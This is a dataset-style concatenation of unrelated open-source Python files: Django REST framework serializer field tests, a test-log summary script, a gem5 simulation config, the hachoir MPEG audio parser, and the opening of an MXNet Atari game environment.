datetime.timedelta(days=3, hours=8, minutes=32, seconds=1, microseconds=123): '3 08:32:01.000123',
}
field = serializers.DurationField()
# Choice types...
class TestChoiceField(FieldValues):
"""
Valid and invalid values for `ChoiceField`.
"""
valid_inputs = {
'poor': 'poor',
'medium': 'medium',
'good': 'good',
}
invalid_inputs = {
'amazing': ['"amazing" is not a valid choice.']
}
outputs = {
'good': 'good',
'': '',
'amazing': 'amazing',
}
field = serializers.ChoiceField(
choices=[
('poor', 'Poor quality'),
('medium', 'Medium quality'),
('good', 'Good quality'),
]
)
def test_allow_blank(self):
"""
If `allow_blank=True` then '' is a valid input.
"""
field = serializers.ChoiceField(
allow_blank=True,
choices=[
('poor', 'Poor quality'),
('medium', 'Medium quality'),
('good', 'Good quality'),
]
)
output = field.run_validation('')
assert output == ''
def test_allow_null(self):
"""
If `allow_null=True` then '' on HTML forms is treated as None.
"""
field = serializers.ChoiceField(
allow_null=True,
choices=[
1, 2, 3
]
)
field.field_name = 'example'
value = field.get_value(QueryDict('example='))
assert value is None
output = field.run_validation(None)
assert output is None
def test_iter_options(self):
"""
iter_options() should return a list of options and option groups.
"""
field = serializers.ChoiceField(
choices=[
('Numbers', ['integer', 'float']),
('Strings', ['text', 'email', 'url']),
'boolean'
]
)
items = list(field.iter_options())
assert items[0].start_option_group
assert items[0].label == 'Numbers'
assert items[1].value == 'integer'
assert items[2].value == 'float'
assert items[3].end_option_group
assert items[4].start_option_group
assert items[4].label == 'Strings'
assert items[5].value == 'text'
assert items[6].value == 'email'
assert items[7].value == 'url'
assert items[8].end_option_group
assert items[9].value == 'boolean'
class TestChoiceFieldWithType(FieldValues):
"""
    Valid and invalid values for a `Choice` field that uses an integer type
    instead of a char type.
"""
valid_inputs = {
'1': 1,
3: 3,
}
invalid_inputs = {
5: ['"5" is not a valid choice.'],
'abc': ['"abc" is not a valid choice.']
}
outputs = {
'1': 1,
1: 1
}
field = serializers.ChoiceField(
choices=[
(1, 'Poor quality'),
(2, 'Medium quality'),
(3, 'Good quality'),
]
)
class TestChoiceFieldWithListChoices(FieldValues):
"""
Valid and invalid values for a `Choice` field that uses a flat list for the
choices, rather than a list of pairs of (`value`, `description`).
"""
valid_inputs = {
'poor': 'poor',
'medium': 'medium',
'good': 'good',
}
invalid_inputs = {
'awful': ['"awful" is not a valid choice.']
}
outputs = {
'good': 'good'
}
field = serializers.ChoiceField(choices=('poor', 'medium', 'good'))
class TestChoiceFieldWithGroupedChoices(FieldValues):
"""
Valid and invalid values for a `Choice` field that uses a grouped list for the
choices, rather than a list of pairs of (`value`, `description`).
"""
valid_inputs = {
'poor': 'poor',
'medium': 'medium',
'good': 'good',
}
invalid_inputs = {
'awful': ['"awful" is not a valid choice.']
}
outputs = {
'good': 'good'
}
field = serializers.ChoiceField(
choices=[
(
'Category',
(
('poor', 'Poor quality'),
('medium', 'Medium quality'),
),
),
('good', 'Good quality'),
]
)
class TestChoiceFieldWithMixedChoices(FieldValues):
"""
    Valid and invalid values for a `Choice` field that mixes single choices
    with paired and grouped choices.
"""
valid_inputs = {
'poor': 'poor',
'medium': 'medium',
'good': 'good',
}
invalid_inputs = {
'awful': ['"awful" is not a valid choice.']
}
outputs = {
'good': 'good'
}
field = serializers.ChoiceField(
choices=[
(
'Category',
(
('poor', 'Poor quality'),
),
),
'medium',
('good', 'Good quality'),
]
)
class TestMultipleChoiceField(FieldValues):
"""
Valid and invalid values for `MultipleChoiceField`.
"""
valid_inputs = {
(): set(),
('aircon',): set(['aircon']),
('aircon', 'manual'): set(['aircon', 'manual']),
}
invalid_inputs = {
'abc': ['Expected a list of items but got type "str".'],
('aircon', 'incorrect'): ['"incorrect" is not a valid choice.']
}
outputs = [
(['aircon', 'manual', 'incorrect'], set(['aircon', 'manual', 'incorrect']))
]
field = serializers.MultipleChoiceField(
choices=[
('aircon', 'AirCon'),
('manual', 'Manual drive'),
('diesel', 'Diesel'),
]
)
def test_against_partial_and_full_updates(self):
field = serializers.MultipleChoiceField(choices=(('a', 'a'), ('b', 'b')))
field.partial = False
assert field.get_value(QueryDict({})) == []
field.partial = True
assert field.get_value(QueryDict({})) == rest_framework.fields.empty
class TestEmptyMultipleChoiceField(FieldValues):
"""
Invalid values for `MultipleChoiceField(allow_empty=False)`.
"""
valid_inputs = {
}
invalid_inputs = (
([], ['This selection may not be empty.']),
)
outputs = [
]
field = serializers.MultipleChoiceField(
choices=[
('consistency', 'Consistency'),
('availability', 'Availability'),
('partition', 'Partition tolerance'),
],
allow_empty=False
)
# File serializers...
class MockFile:
def __init__(self, name='', size=0, url=''):
self.name = name
self.size = size
self.url = url
def __eq__(self, other):
return (
isinstance(other, MockFile) and
self.name == other.name and
self.size == other.size and
self.url == other.url
)
class TestFileField(FieldValues):
"""
Values for `FileField`.
"""
valid_inputs = [
(MockFile(name='example', size=10), MockFile(name='example', size=10))
]
invalid_inputs = [
('invalid', ['The submitted data was not a file. Check the encoding type on the form.']),
(MockFile(name='example.txt', size=0), ['The submitted file is empty.']),
(MockFile(name='', size=10), ['No filename could be determined.']),
(MockFile(name='x' * 100, size=10), ['Ensure this filename has at most 10 characters (it has 100).'])
]
outputs = [
(MockFile(name='example.txt', url='/example.txt'), '/example.txt'),
('', None)
]
field = serializers.FileField(max_length=10)
class TestFileFieldWithName(FieldValues):
"""
Values for `FileField` with a filename output instead of URLs.
"""
valid_inputs = {}
invalid_inputs = {}
outputs = [
(MockFile(name='example.txt', url='/example.txt'), 'example.txt')
]
field = serializers.FileField(use_url=False)
# Stub out a mock Django `forms.ImageField` class so we don't *actually*
# call into its regular validation, or require PIL for testing.
class FailImageValidation(object):
def to_python(self, value):
raise serializers.ValidationError(self.error_messages['invalid_image'])
class PassImageValidation(object):
def to_python(self, value):
return value
class TestInvalidImageField(FieldValues):
"""
Values for an invalid `ImageField`.
"""
valid_inputs = {}
invalid_inputs = [
(MockFile(name='example.txt', size=10), ['Upload a valid image. The file you uploaded was either not an image or a corrupted image.'])
]
outputs = {}
field = serializers.ImageField(_DjangoImageField=FailImageValidation)
class TestValidImageField(FieldValues):
"""
    Values for a valid `ImageField`.
"""
valid_inputs = [
(MockFile(name='example.txt', size=10), MockFile(name='example.txt', size=10))
]
invalid_inputs = {}
outputs = {}
field = serializers.ImageField(_DjangoImageField=PassImageValidation)
# Composite serializers...
class TestListField(FieldValues):
"""
Values for `ListField` with IntegerField as child.
"""
valid_inputs = [
([1, 2, 3], [1, 2, 3]),
(['1', '2', '3'], [1, 2, 3]),
([], [])
]
invalid_inputs = [
('not a list', ['Expected a list of items but got type "str".']),
([1, 2, 'error'], ['A valid integer is required.']),
({'one': 'two'}, ['Expected a list of items but got type "dict".'])
]
outputs = [
([1, 2, 3], [1, 2, 3]),
(['1', '2', '3'], [1, 2, 3])
]
field = serializers.ListField(child=serializers.IntegerField())
def test_no_source_on_child(self):
with pytest.raises(AssertionError) as exc_info:
serializers.ListField(child=serializers.IntegerField(source='other'))
assert str(exc_info.value) == (
"The `source` argument is not meaningful when applied to a `child=` field. "
"Remove `source=` from the field declaration."
)
def test_collection_types_are_invalid_input(self):
field = serializers.ListField(child=serializers.CharField())
input_value = ({'one': 'two'})
with pytest.raises(serializers.ValidationError) as exc_info:
field.to_internal_value(input_value)
assert exc_info.value.detail == ['Expected a list of items but got type "dict".']
class TestEmptyListField(FieldValues):
"""
Values for `ListField` with allow_empty=False flag.
"""
valid_inputs = {}
invalid_inputs = [
([], ['This list may not be empty.'])
]
outputs = {}
field = serializers.ListField(child=serializers.IntegerField(), allow_empty=False)
class TestUnvalidatedListField(FieldValues):
"""
Values for `ListField` with no `child` argument.
"""
valid_inputs = [
([1, '2', True, [4, 5, 6]], [1, '2', True, [4, 5, 6]]),
]
invalid_inputs = [
('not a list', ['Expected a list of items but got type "str".']),
]
outputs = [
([1, '2', True, [4, 5, 6]], [1, '2', True, [4, 5, 6]]),
]
field = serializers.ListField()
class TestDictField(FieldValues):
"""
    Values for `DictField` with CharField as child.
"""
valid_inputs = [
({'a': 1, 'b': '2', 3: 3}, {'a': '1', 'b': '2', '3': '3'}),
]
invalid_inputs = [
({'a': 1, 'b': None}, ['This field may not be null.']),
('not a dict', ['Expected a dictionary of items but got type "str".']),
]
outputs = [
({'a': 1, 'b': '2', 3: 3}, {'a': '1', 'b': '2', '3': '3'}),
]
field = serializers.DictField(child=serializers.CharField())
def test_no_source_on_child(self):
with pytest.raises(AssertionError) as exc_info:
serializers.DictField(child=serializers.CharField(source='other'))
assert str(exc_info.value) == (
"The `source` argument is not meaningful when applied to a `child=` field. "
"Remove `source=` from the field declaration."
)
def test_allow_null(self):
"""
If `allow_null=True` then `None` is a valid input.
"""
field = serializers.DictField(allow_null=True)
output = field.run_validation(None)
assert output is None
class TestDictFieldWithNullChild(FieldValues):
"""
    Values for `DictField` with an allow_null CharField as child.
"""
valid_inputs = [
({'a': None, 'b': '2', 3: 3}, {'a': None, 'b': '2', '3': '3'}),
]
invalid_inputs = [
]
outputs = [
({'a': None, 'b': '2', 3: 3}, {'a': None, 'b': '2', '3': '3'}),
]
field = serializers.DictField(child=serializers.CharField(allow_null=True))
class TestUnvalidatedDictField(FieldValues):
"""
    Values for `DictField` with no `child` argument.
"""
valid_inputs = [
({'a': 1, 'b': [4, 5, 6], 1: 123}, {'a': 1, 'b': [4, 5, 6], '1': 123}),
]
invalid_inputs = [
('not a dict', ['Expected a dictionary of items but got type "str".']),
]
outputs = [
({'a': 1, 'b': [4, 5, 6]}, {'a': 1, 'b': [4, 5, 6]}),
]
field = serializers.DictField()
class TestJSONField(FieldValues):
"""
Values for `JSONField`.
"""
valid_inputs = [
({
'a': 1,
'b': ['some', 'list', True, 1.23],
'3': None
}, {
'a': 1,
'b': ['some', 'list', True, 1.23],
'3': None
}),
]
invalid_inputs = [
({'a': set()}, ['Value must be valid JSON.']),
]
outputs = [
({
'a': 1,
'b': ['some', 'list', True, 1.23],
'3': 3
}, {
'a': 1,
'b': ['some', 'list', True, 1.23],
'3': 3
}),
]
field = serializers.JSONField()
class TestBinaryJSONField(FieldValues):
"""
Values for `JSONField` with binary=True.
"""
valid_inputs = [
(b'{"a": 1, "3": null, "b": ["some", "list", true, 1.23]}', {
'a': 1,
'b': ['some', 'list', True, 1.23],
'3': None
}),
]
invalid_inputs = [
('{"a": "unterminated string}', ['Value must be valid JSON.']),
]
outputs = [
(['some', 'list', True, 1.23], b'["some", "list", true, 1.23]'),
]
field = serializers.JSONField(binary=True)
# Tests for FileField.
# ---------------------
class MockRequest:
def build_absolute_uri(self, value):
return 'http://example.com' + value
class TestFileFieldContext:
def test_fully_qualified_when_request_in_context(self):
field = serializers.FileField(max_length=10)
field._context = {'request': MockRequest()}
obj = MockFile(name='example.txt', url='/example.txt')
value = field.to_representation(obj)
assert value == 'http://example.com/example.txt'
# Tests for SerializerMethodField.
# --------------------------------
class TestSerializerMethodField:
def test_serializer_method_field(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.SerializerMethodField()
def get_example_field(self, obj):
return 'ran get_example_field(%d)' % obj['example_field']
serializer = ExampleSerializer({'example_field': 123})
assert serializer.data == {
'example_field': 'ran get_example_field(123)'
}
def test_redundant_method_name(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.SerializerMethodField('get_example_field')
with pytest.raises(AssertionError) as exc_info:
ExampleSerializer().fields
assert str(exc_info.value) == (
"It is redundant to specify `get_example_field` on "
"SerializerMethodField 'example_field' in serializer "
"'ExampleSerializer', because it is the same as the default "
"method name. Remove the `method_name` argument."
)
| bsd-2-clause |
CarlosMontilla/FxM | scripts/test/check_tests.py | 1 | 4412 | #!/usr/bin/env python3
"""!
@file
"""
import glob
import sys
import time
# @todo: manage tests that have to be checked manually (such as plots)
def analyse_log(filename):
"""!
@brief Analyse a test log to find passed and failed tests
@param filename Name of the log file
    @return A dict with keys "name", "compiled", "ran", "pass" and "fail"
"""
passed_str = "Passed"
failed_str = "Failed"
name_str = "Test unit: "
compiled_str = "Compiled on: "
ran_str = "\t Local "
name = ""
compiled_date = ""
run_date = ""
pass_count = 0
fail_count = 0
    with open(filename, 'r') as log_file:
        for line in log_file:
            if name_str in line:
                name = line[len(name_str):-1]
            elif compiled_str in line:
                compiled_date = line[len(compiled_str):-1]
            elif ran_str in line:
                run_date = line[len(ran_str):-1]
            elif passed_str in line:
                pass_count += 1
            elif failed_str in line:
                fail_count += 1
if name == "":
name = filename
res = {}
res["name"] = name
res["compiled"] = compiled_date
res["ran"] = run_date
res["pass"] = pass_count
res["fail"] = fail_count
return res
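# A sketch of the expected result shape (the filename and values below are
# illustrative, not taken from a real log):
#
#   analyse_log("unit_math.log")
#   # -> {'name': 'unit_math', 'compiled': '...', 'ran': '...',
#   #     'pass': 12, 'fail': 0}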
def main(folder, extension, outfile):
"""!
@brief Main function, analyse all the file in a directory with a given
extension and print the results of the passed and failed tests
@param folder Folder to analyse
@param extension File extension to analyse
@param outfile File to save a more extensive description of the tests
@return nothing
"""
fid = open(outfile, 'w+')
print("Test check run on " + time.strftime("%B %d %Y at %H:%M:%S %Z"),
file=fid)
print("", file=fid)
print("|{:^5}|{:^45}|{:^10}|{:^10}|".format("Num", "Test name", "Passed",
"Failed"), file=fid)
print("|{:^5}|{:45}+{:10}+{:10}|".format("-"*5, "-"*45, "-"*10, "-"*10), file=fid)
print("|{:^5}|{:^45}|{:^10}|{:^10}|".format("Num", "Test name", "Passed",
"Failed"))
print("|{:^5}|{:45}+{:10}+{:10}|".format("-"*5, "-"*45, "-"*10, "-"*10))
total_pass = 0
total_fail = 0
idx = 0
failed_units = []
for filename in glob.iglob(folder + "/*/**/" + "*." + extension,
recursive=True):
idx += 1
res = analyse_log(filename)
total_pass += res["pass"]
total_fail += res["fail"]
print("|{:^5}|{:<45}|{:^10}|{:^10}|".format(idx, res["name"],
res["pass"], res["fail"]), file=fid)
print("|{:^5}|{:<45}|{:^10}|{:^10}|".format(idx, res["name"],
res["pass"], res["fail"]))
print("|{:5}-{:45}+{:10}+{:10}|".format("-"*5, "-"*45, "-"*10, "-"*10), file=fid)
print("|{:5} {:<45}|{:^10}|{:^10}|".format("", "Total", total_pass,
total_fail), file=fid)
print("|{:5}-{:45}+{:10}+{:10}|".format("-"*5, "-"*45, "-"*10, "-"*10))
print("|{:5} {:<45}|{:^10}|{:^10}|".format("", "Total", total_pass,
total_fail))
print("", file=fid)
print("", file=fid)
total_pass = 0
total_fail = 0
idx = 0
for filename in glob.iglob(folder + "/*/**/" + "*." + extension,
recursive=True):
idx += 1
res = analyse_log(filename)
total_pass += res["pass"]
total_fail += res["fail"]
print("Test N " + str(idx) + ": " + res["name"], file=fid)
print("\t Logfile: " + filename, file=fid)
print("\t Compiled on: ", res["compiled"], file=fid)
print("\t Ran on: ", res["ran"], file=fid)
print("\t Passed tests: " + str(res["pass"]), file=fid)
print("\t Failed tests: " + str(res["fail"]), file=fid)
print("", file=fid)
if res["fail"] > 0:
failed_units.append((idx, res["name"]))
print("", file=fid)
if (len(failed_units) > 0):
print("FAILED UNITS:", file=fid)
for unit in failed_units:
print("\t" + str(unit[0]) + ": " + unit[1], file=fid)
else:
print("ALL TEST PASSED SUCCESSFULLY", file=fid)
fid.close()
if __name__ == "__main__":
main(sys.argv[1], sys.argv[2], sys.argv[3])
| gpl-3.0 |
Weil0ng/gem5 | tests/configs/tsunami-minor.py | 13 | 2346 | # Copyright (c) 2012 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Andreas Sandberg
from m5.objects import *
from alpha_generic import *
root = LinuxAlphaFSSystemUniprocessor(mem_mode='timing',
mem_class=DDR3_1600_8x8,
cpu_class=MinorCPU).create_root()
| bsd-3-clause |
duramato/SickRage | lib/hachoir_parser/audio/mpeg_audio.py | 86 | 13752 | """
MPEG audio file parser.
Creation: 12 December 2005
Author: Victor Stinner
"""
from hachoir_parser import Parser
from hachoir_core.field import (FieldSet,
MissingField, ParserError, createOrphanField,
Bit, Bits, Enum,
PaddingBits, PaddingBytes,
RawBytes)
from hachoir_parser.audio.id3 import ID3v1, ID3v2
from hachoir_core.endian import BIG_ENDIAN
from hachoir_core.tools import humanFrequency, humanBitSize
from hachoir_core.bits import long2raw
from hachoir_core.error import HACHOIR_ERRORS
from hachoir_core.stream import InputStreamError
# Max MP3 file size: 200 MB (stored in bits)
MAX_FILESIZE = 200*1024*1024*8
class Frame(FieldSet):
VERSION_NAME = { 0: "2.5", 2: "2", 3: "1" }
MPEG_I = 3
MPEG_II = 2
MPEG_II_5 = 0
LAYER_NAME = { 1: "III", 2: "II", 3: "I" }
LAYER_I = 3
LAYER_II = 2
LAYER_III = 1
# Bit rates (bit_rate * 1000 = bits/sec)
# key 15 is always invalid
BIT_RATES = {
1: ( # MPEG1
( 0, 32, 64, 96, 128, 160, 192, 224, 256, 288, 320, 352, 384, 416, 448 ), # layer I
( 0, 32, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320, 384 ), # layer II
( 0, 32, 40, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320 ), # layer III
# - 1 2 3 4 5 6 7 8 9 10 11 12 13 14 -
),
2: ( # MPEG2 / MPEG2.5
( 0, 32, 48, 56, 64, 80, 96, 112, 128, 144, 160, 176, 192, 224, 256 ), # layer I
( 0, 8, 16, 24, 32, 40, 48, 56, 64, 80, 96, 112, 128, 144, 160 ), # layer II
( 0, 8, 16, 24, 32, 40, 48, 56, 64, 80, 96, 112, 128, 144, 160 ), # layer III
# - 1 2 3 4 5 6 7 8 9 10 11 12 13 14 -
)
}
SAMPLING_RATES = {
3: {0: 44100, 1: 48000, 2: 32000}, # MPEG1
2: {0: 22050, 1: 24000, 2: 16000}, # MPEG2
0: {0: 11025, 1: 12000, 2: 8000} # MPEG2.5
}
    EMPHASIS_NAME = {0: "none", 1: "50/15 ms", 3: "CCITT J.17"}
CHANNEL_MODE_NAME = {
0: "Stereo",
1: "Joint stereo",
2: "Dual channel",
3: "Single channel"
}
# Channel mode => number of channels
NB_CHANNEL = {
0: 2,
1: 2,
2: 2,
3: 1,
}
def __init__(self, *args, **kw):
FieldSet.__init__(self, *args, **kw)
if not self._size:
frame_size = self.getFrameSize()
if not frame_size:
raise ParserError("MPEG audio: Invalid frame %s" % self.path)
self._size = min(frame_size * 8, self.parent.size - self.address)
def createFields(self):
# Header
yield PaddingBits(self, "sync", 11, "Synchronize bits (set to 1)", pattern=1)
yield Enum(Bits(self, "version", 2, "MPEG audio version"), self.VERSION_NAME)
yield Enum(Bits(self, "layer", 2, "MPEG audio layer"), self.LAYER_NAME)
yield Bit(self, "crc16", "No CRC16 protection?")
# Rates and padding
yield Bits(self, "bit_rate", 4, "Bit rate")
yield Bits(self, "sampling_rate", 2, "Sampling rate")
yield Bit(self, "use_padding", "Stream field use padding?")
yield Bit(self, "extension", "Extension")
# Channel mode, mode extension, copyright, ...
yield Enum(Bits(self, "channel_mode", 2, "Channel mode"), self.CHANNEL_MODE_NAME)
yield Bits(self, "mode_ext", 2, "Mode extension")
yield Bit(self, "copyright", "Is copyrighted?")
yield Bit(self, "original", "Is original?")
yield Enum(Bits(self, "emphasis", 2, "Emphasis"), self.EMPHASIS_NAME)
size = (self.size - self.current_size) / 8
if size:
yield RawBytes(self, "data", size)
def isValid(self):
return (self["layer"].value != 0
and self["sync"].value == 2047
and self["version"].value != 1
and self["sampling_rate"].value != 3
and self["bit_rate"].value not in (0, 15)
and self["emphasis"].value != 2)
def getSampleRate(self):
"""
Read sampling rate. Returns None on error.
"""
version = self["version"].value
rate = self["sampling_rate"].value
try:
return self.SAMPLING_RATES[version][rate]
except (KeyError, IndexError):
return None
def getBitRate(self):
"""
Read bit rate in bit/sec. Returns None on error.
"""
layer = 3 - self["layer"].value
bit_rate = self["bit_rate"].value
if bit_rate in (0, 15):
return None
if self["version"].value == 3:
dataset = self.BIT_RATES[1] # MPEG1
else:
dataset = self.BIT_RATES[2] # MPEG2 / MPEG2.5
try:
return dataset[layer][bit_rate] * 1000
except (KeyError, IndexError):
return None
def getFrameSize(self):
"""
Read frame size in bytes. Returns None on error.
"""
frame_size = self.getBitRate()
if not frame_size:
return None
sample_rate = self.getSampleRate()
if not sample_rate:
return None
padding = int(self["use_padding"].value)
if self["layer"].value == self.LAYER_III:
if self["version"].value == self.MPEG_I:
return (frame_size * 144) // sample_rate + padding
else:
return (frame_size * 72) // sample_rate + padding
elif self["layer"].value == self.LAYER_II:
return (frame_size * 144) / sample_rate + padding
else: # self.LAYER_I:
frame_size = (frame_size * 12) / sample_rate
return (frame_size + padding) * 4
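    # Worked example (illustrative): a 128 kbit/s, 44.1 kHz MPEG1 layer III
    # frame without padding spans (128000 * 144) // 44100 = 417 bytes.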
def getNbChannel(self):
return self.NB_CHANNEL[ self["channel_mode"].value ]
def createDescription(self):
info = ["layer %s" % self["layer"].display]
bit_rate = self.getBitRate()
if bit_rate:
info.append("%s/sec" % humanBitSize(bit_rate))
sampling_rate = self.getSampleRate()
if sampling_rate:
info.append(humanFrequency(sampling_rate))
return "MPEG-%s %s" % (self["version"].display, ", ".join(info))
def findSynchronizeBits(parser, start, max_size):
"""
Find synchronisation bits (11 bits set to 1)
Returns None on error, or number of bytes before the synchronization.
"""
address0 = parser.absolute_address
end = start + max_size
size = 0
while start < end:
# Fast search: search 0xFF (first byte of sync frame field)
length = parser.stream.searchBytesLength("\xff", False, start, end)
if length is None:
return None
size += length
start += length * 8
# Strong validation of frame: create the frame
# and call method isValid()
try:
frame = createOrphanField(parser, start-address0, Frame, "frame")
valid = frame.isValid()
except HACHOIR_ERRORS:
valid = False
if valid:
return size
# Invalid frame: continue
start += 8
size += 1
return None
class Frames(FieldSet):
# Padding bytes allowed before a frame
MAX_PADDING = 256
def synchronize(self):
addr = self.absolute_address
start = addr + self.current_size
end = min(start + self.MAX_PADDING*8, addr + self.size)
padding = findSynchronizeBits(self, start, end)
if padding is None:
raise ParserError("MPEG audio: Unable to find synchronization bits")
if padding:
return PaddingBytes(self, "padding[]", padding, "Padding before synchronization")
else:
return None
def looksConstantBitRate(self, count=10):
"""
Guess if frames are constant bit rate. If it returns False, you can
be sure that frames are variable bit rate. Otherwise, it looks like
constant bit rate (on first count fields).
"""
check_keys = ("version", "layer", "bit_rate")
last_field = None
for index, field in enumerate(self.array("frame")):
if last_field:
for key in check_keys:
if field[key].value != last_field[key].value:
return False
last_field = field
if index == count:
break
return True
def createFields(self):
# Find synchronisation bytes
padding = self.synchronize()
if padding:
yield padding
while self.current_size < self.size:
yield Frame(self, "frame[]")
# padding = self.synchronize()
# if padding:
# yield padding
# Read raw bytes at the end (if any)
size = (self.size - self.current_size) / 8
if size:
yield RawBytes(self, "raw", size)
def createDescription(self):
if self.looksConstantBitRate():
text = "(looks like) Constant bit rate (CBR)"
else:
text = "Variable bit rate (VBR)"
return "Frames: %s" % text
def createMpegAudioMagic():
# ID3v1 magic
magics = [("TAG", 0)]
# ID3v2 magics
for ver_major in ID3v2.VALID_MAJOR_VERSIONS:
magic = "ID3%c\x00" % ver_major
magics.append( (magic,0) )
# MPEG frame magic
# TODO: Use longer magic: 32 bits instead of 16 bits
SYNC_BITS = 2047
for version in Frame.VERSION_NAME.iterkeys():
for layer in Frame.LAYER_NAME.iterkeys():
for crc16 in (0, 1):
magic = (SYNC_BITS << 5) | (version << 3) | (layer << 1) | crc16
magic = long2raw(magic, BIG_ENDIAN, 2)
magics.append( (magic, 0) )
return magics
class MpegAudioFile(Parser):
PARSER_TAGS = {
"id": "mpeg_audio",
"category": "audio",
"file_ext": ("mpa", "mp1", "mp2", "mp3"),
"mime": (u"audio/mpeg",),
"min_size": 4*8,
# "magic": createMpegAudioMagic(),
"description": "MPEG audio version 1, 2, 2.5",
"subfile": "skip",
}
endian = BIG_ENDIAN
def validate(self):
if self[0].name in ("id3v2", "id3v1"):
return True
if not self.stream.checked: # TODO: is it possible to handle piped input?
return False
# Validate first 5 frames
for index in xrange(5):
try:
frame = self["frames/frame[%u]" % index]
except MissingField:
# Require a least one valid frame
if (1 <= index) \
and self["frames"].done:
return True
return "Unable to get frame #%u" % index
except (InputStreamError, ParserError):
return "Unable to create frame #%u" % index
# Check first frame values
if not frame.isValid():
return "Frame #%u is invalid" % index
# Check that all frames are similar
if not index:
frame0 = frame
else:
if frame0["channel_mode"].value != frame["channel_mode"].value:
return "Frame #%u channel mode is different" % index
return True
def createFields(self):
# Read ID3v2 (if any)
if self.stream.readBytes(0, 3) == "ID3":
yield ID3v2(self, "id3v2")
if self._size is None: # TODO: is it possible to handle piped input?
raise NotImplementedError
# Check if file is ending with ID3v1 or not and compute frames size
frames_size = self.size - self.current_size
addr = self.size - 128*8
if 0 <= addr:
has_id3 = (self.stream.readBytes(addr, 3) == "TAG")
if has_id3:
frames_size -= 128*8
else:
has_id3 = False
# Read frames (if any)
if frames_size:
yield Frames(self, "frames", size=frames_size)
# Read ID3v1 (if any)
if has_id3:
yield ID3v1(self, "id3v1")
def createDescription(self):
if "frames" in self:
frame = self["frames/frame[0]"]
return "%s, %s" % (frame.description, frame["channel_mode"].display)
elif "id3v2" in self:
return self["id3v2"].description
elif "id3v1" in self:
return self["id3v1"].description
else:
return "MPEG audio"
def createContentSize(self):
# Get "frames" field
field = self[0]
if field.name != "frames":
try:
field = self[1]
except MissingField:
# File only contains ID3v1 or ID3v2
return field.size
# Error: second field are not the frames"?
if field.name != "frames":
return None
# Go to last frame
frames = field
frame = frames["frame[0]"]
address0 = field.absolute_address
size = address0 + frame.size
while True:
try:
# Parse one MPEG audio frame
frame = createOrphanField(frames, size - address0, Frame, "frame")
# Check frame 32 bits header
if not frame.isValid():
break
except HACHOIR_ERRORS:
break
if MAX_FILESIZE < (size + frame.size):
break
size += frame.size
# ID3v1 at the end?
try:
if self.stream.readBytes(size, 3) == "TAG":
size += ID3v1.static_size
except InputStreamError:
pass
return size
| gpl-3.0 |
xcgoner/dist-mxnet | example/reinforcement-learning/dqn/atari_game.py | 25 | 7148 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
__author__ = 'sxjscience'
import mxnet as mx
import numpy
import cv2
import logging
import os
from utils import *
from replay_memory import ReplayMemory
from game import Game
from game import DEFAULT_MAX_EPISODE_STEP
logger = logging.getLogger(__name__)
_dirname = os.path.dirname(os.path.realpath(__file__))
_default_rom_path = os.path.join(_dirname, "roms", "breakout.bin")
def ale_load_from_rom(rom_path, display_screen):
rng = get_numpy_rng()
try:
from ale_python_interface import ALEInterface
except ImportError as e:
raise ImportError('Unable to import the python package of Arcade Learning Environment. ' \
'ALE may not have been installed correctly. Refer to ' \
                          '`https://github.com/mgbellemare/Arcade-Learning-Environment` for some ' \
'installation guidance')
ale = ALEInterface()
ale.setInt('random_seed', rng.randint(1000))
if display_screen:
import sys
if sys.platform == 'darwin':
import pygame
pygame.init()
ale.setBool('sound', False) # Sound doesn't work on OSX
ale.setBool('display_screen', True)
else:
ale.setBool('display_screen', False)
ale.setFloat('repeat_action_probability', 0)
ale.loadROM(rom_path)
return ale
class AtariGame(Game):
def __init__(self,
rom_path=_default_rom_path,
frame_skip=4, history_length=4,
resize_mode='scale', resized_rows=84, resized_cols=84, crop_offset=8,
display_screen=False, max_null_op=30,
replay_memory_size=1000000,
replay_start_size=100,
death_end_episode=True):
super(AtariGame, self).__init__()
self.rng = get_numpy_rng()
self.ale = ale_load_from_rom(rom_path=rom_path, display_screen=display_screen)
self.start_lives = self.ale.lives()
self.action_set = self.ale.getMinimalActionSet()
self.resize_mode = resize_mode
